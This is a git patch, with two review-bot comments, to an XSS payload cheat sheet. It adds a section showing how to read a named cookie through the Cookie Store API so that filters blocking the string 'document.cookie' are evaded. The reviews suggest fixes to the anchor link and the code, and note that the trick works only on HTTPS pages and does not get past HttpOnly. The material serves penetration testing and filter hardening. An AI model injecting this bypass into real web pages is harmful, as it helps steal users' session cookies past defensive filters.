From 5d561ea7d6e726a326a0bc6baecf245327143fb5 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:23:36 -0500 Subject: [PATCH] Added document.cookie blacklist bypass Added an alternative to document.cookie for situations when this text is blacklisted. --- XSS Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6cb88ea..a079cf6 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -54,6 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass space filter](#bypass-space-filter) - [Bypass email filter](#bypass-email-filter) - [Bypass document blacklist](#bypass-document-blacklist) + - [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist) - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) @@ -774,6 +775,14 @@ $ echo "" | xxd window["doc"+"ument"] ``` +### Bypass document.cookie blacklist + +This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. + +``` +const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); +``` + ### Bypass using javascript inside a string ```javascript
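Review bot: the new TOC entry in the first hunk points at `#bypass-document.cookie-blacklist`, but GitHub strips punctuation when it generates heading anchors, so the `### Bypass document.cookie blacklist` heading added below will be slugged as `#bypass-documentcookie-blacklist` and the link will not resolve. Change the entry to `- [Bypass document.cookie blacklist](#bypass-documentcookie-blacklist)`; the other entries in this list follow the same convention (e.g. `#bypass-document-blacklist`).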
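Review bot: in the second hunk, `cookieValue.value` throws a `TypeError` when the named cookie does not exist, because `cookieStore.get()` resolves to `null` rather than rejecting; guard it, e.g. `.then((c)=>{if(c){console.log(c.value);}})`. The `Promise.resolve(...)` wrapper is redundant since `cookieStore.get()` already returns a promise, so `window.cookieStore.get('COOKIE NAME').then(...)` is sufficient and shorter, and the `const cookiePromise=` assignment is never used. Two caveats belong in the prose so readers do not overestimate the technique: the Cookie Store API is only exposed in secure contexts (HTTPS pages), and it respects the `HttpOnly` flag exactly as `document.cookie` does, so this works around a keyword blacklist, not around that flag. Finally, tag the fence with `javascript` to match the block that follows (`### Bypass using javascript inside a string`), which uses a tagged fence.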